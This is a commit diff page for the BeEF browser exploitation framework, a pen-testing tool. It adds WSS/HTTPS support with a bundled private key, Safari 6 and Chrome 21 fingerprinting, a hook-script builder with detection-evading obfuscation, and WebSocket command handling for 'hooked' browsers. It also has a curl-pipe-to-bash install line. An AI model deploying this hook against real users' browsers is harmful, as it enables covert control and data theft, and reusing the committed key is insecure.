Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
marc
2012-08-30 11:33:26 +01:00
parent c708a60bdd 57f68725bc
commit 612343990d
40 changed files with 1025 additions and 162 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Gemfile
View File

@@ -39,6 +39,9 @@ gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
# notifications
gem "twitter"
if ENV['BEEF_TEST']
# for running unit tests
gem "test-unit"

2
README.mkd
View File

@@ -72,7 +72,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.6-alpha
0.4.3.7-alpha

11
beef
View File

@@ -81,7 +81,7 @@ Socket.do_not_reverse_lookup = true
case config.get("beef.database.driver")
when "sqlite"
DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
when "mysql","postgres"
when "mysql", "postgres"
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
@@ -124,12 +124,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end
end
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -140,7 +141,7 @@ if config.get("beef.extension.console.shell.enable") == true
begin
FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
rescue Interrupt
end
else

19
beef_cert.pem Normal file
View File

@@ -0,0 +1,19 @@
-----BEGIN CERTIFICATE-----
MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
GkY0IBg9+j6XX4JwEXxCGt0a
-----END CERTIFICATE-----

16
beef_key.pem Normal file
View File

@@ -0,0 +1,16 @@
-----BEGIN PRIVATE KEY-----
MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
yBgay+U9QuoEO425
-----END PRIVATE KEY-----

15
config.yaml
View File

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.6-alpha'
version: '0.4.3.7-alpha'
debug: false
restrictions:
@@ -42,8 +42,9 @@ beef:
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: false # use WebSocketSecure
port: 11989
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -51,6 +52,14 @@ beef:
enable: false
type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file

16
core/main/client/are.js
View File

@@ -1,4 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.are = {
init:function(){
var Jools = require('jools');

28
core/main/client/browser.js
View File

@@ -211,13 +211,21 @@ beef.browser = {
isS5: function() {
return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
},
/**
* Returns true if Safari 6.xx
* @example: beef.browser.isS6()
*/
isS6: function() {
return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
},
/**
* Returns true if Safari.
* @example: beef.browser.isS()
*/
isS: function() {
return this.isS4() || this.isS5() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
},
/**
@@ -348,12 +356,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
},
/**
* Returns true if Chrome 21.
* @example: beef.browser.isC21()
*/
isC21: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21();
},
/**
@@ -429,6 +445,7 @@ beef.browser = {
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C20: this.isC20(), // Chrome 20
C21: this.isC21(), // Chrome 21
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -463,6 +480,7 @@ beef.browser = {
S4: this.isS4(), // Safari 4.xx
S5: this.isS5(), // Safari 5.xx
S6: this.isS6(), // Safari 6.x
S: this.isS() // Safari any version
}
},
@@ -491,8 +509,9 @@ beef.browser = {
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isC20()) { return '20' }; // Chrome 20
if (this.isC21()) { return '21' }; // Chrome 21
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3
if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5
if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6
@@ -515,8 +534,9 @@ beef.browser = {
if (this.isS4()) { return '4' }; // Safari 4
if (this.isS5()) { return '5' }; // Safari 5
if (this.isS6()) { return '6' }; // Safari 5
if (this.isO9_52()) { return '9.5'}; // Opera 9.5x
if (this.isO9_52()) { return '9.5'}; // Opera 9.5x
if (this.isO9_60()) { return '9.6'}; // Opera 9.6
if (this.isO10()) { return '10' }; // Opera 10.xx
if (this.isO11()) { return '11' }; // Opera 11.xx

3
core/main/client/net.js
View File

@@ -23,6 +23,7 @@ beef.net = {
host:"<%= @beef_host %>",
port:"<%= @beef_port %>",
hook:"<%= @beef_hook %>",
httpproto:"<%= @beef_proto %>",
handler:'/dh',
chop:500,
pad:30, //this is the amount of padding for extra params such as pc, pid and sid
@@ -137,7 +138,7 @@ beef.net = {
push:function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
}
},

26
core/main/client/timeout.js Normal file
View File

@@ -0,0 +1,26 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).
To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor
*/
setTimeout(beef_init, 1000);

2
core/main/client/updater.js
View File

@@ -66,7 +66,7 @@ beef.updater = {
get_commands: function(http_response) {
try {
this.lock = true;
beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});

19
core/main/client/websocket.js
View File

@@ -27,15 +27,18 @@ beef.websocket = {
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var protocol = "ws://";
if(webSocketSecure)
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
@@ -43,10 +46,10 @@ beef.websocket = {
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.alive();
}

5
core/main/console/banners.rb
View File

@@ -89,12 +89,13 @@ module Banners
def print_network_interfaces_routes
configuration = BeEF::Core::Configuration.instance
prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
print_more data
end

240
core/main/handlers/modules/beefjs.rb
View File

@@ -14,126 +14,152 @@
# limitations under the License.
#
module BeEF
module Core
module Handlers
module Modules
module Core
module Handlers
module Modules
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beefjs = ''
# @note location of sub files
beefjs_path = "#{$root_dir}/core/main/client/"
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beef_js = ''
# @note location of sub files
beef_js_path = "#{$root_dir}/core/main/client/"
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
end
end
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
# @note construct the beefjs string from file(s)
js_sub_files.each {|js_sub_file_name|
js_sub_file_abs_path = beefjs_path + js_sub_file_name
beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
}
# @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
# @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
ext_js_sub_files.each{ |ext_js_sub_file|
if config.get("beef.extension.evasion.enable")
if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
# do not obfuscate the file
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
else
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
else
# Evasion is not enabled, do not obfuscate anything
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
}
# @note create the config for the hooked browser session
# @note construct the beef_js string from file(s)
beef_js_sub_files.each { |beef_js_sub_file|
beef_js_sub_file_path = beef_js_path + beef_js_sub_file
beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
}
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_config = BeEF::Core::Server.instance.to_h
# @note create the config for the hooked browser session
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
end
end
end
# @note Set some WebSocket properties
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end
# @note populate place holders in the beef_js string and set the response body
eruby = Erubis::FastEruby.new(beef_js)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
else
@final_hook = ext_js_to_not_obfuscate + @hook
end
# @note Return the final hook to be sent to the browser
@body << @final_hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each { |k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
end
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each {|k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
end
end
end

14
core/main/logger.rb
View File

@@ -24,6 +24,10 @@ module Core
# Constructor
def initialize
@logs = BeEF::Core::Models::Log
@config = BeEF::Core::Configuration.instance
# if notifications are enabled create a new instance
@notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
end
# Registers a new event in the logs
@@ -34,6 +38,9 @@ module Core
def register(from, event, hb = 0)
# type conversion to enforce standards
hb = hb.to_i
# get time now
time_now = Time.now
# arguments type checking
raise Exception::TypeError, '"from" needs to be a string' if not from.string?
@@ -41,7 +48,12 @@ module Core
raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
# logging the new event into the database
@logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
@logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
# if notifications are enabled send the info there too
if @notifications
@notifications.new(from, event, time_now, hb)
end
# return
true

150
core/main/network_stack/websocket/websocket.rb
View File

@@ -27,17 +27,156 @@ module BeEF
@@activeSocket= Hash.new
@@lastalive= Hash.new
@@config = BeEF::Core::Configuration.instance
#@@wsopt=nil
MOUNTS = BeEF::Core::Server.instance.mounts
def initialize
port = @@config.get("beef.http.websocket.port")
secure = @@config.get("beef.http.websocket.secure")
@root_dir = File.expand_path('../../../../../', __FILE__)
if (secure)
ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
:tls_options => {
:private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
:cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
}
}
# @note Start a WSS server socket
start_websocket_server(ws_secure_options, true)
end
# @note Start a WS server socket
ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
start_websocket_server(ws_options,false)
# #Thread for websocket-secure
# Thread.new {
# port = @@config.get("beef.http.websocket.secure_port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
# :tls_options => {
# :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
# :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
# }
# }
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket-secured channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket-secured error: #{e}"
# end
# end
# }
#
# }
#
##Thread for websocket
#Thread.new {
# port = @@config.get("beef.http.websocket.port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port}
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
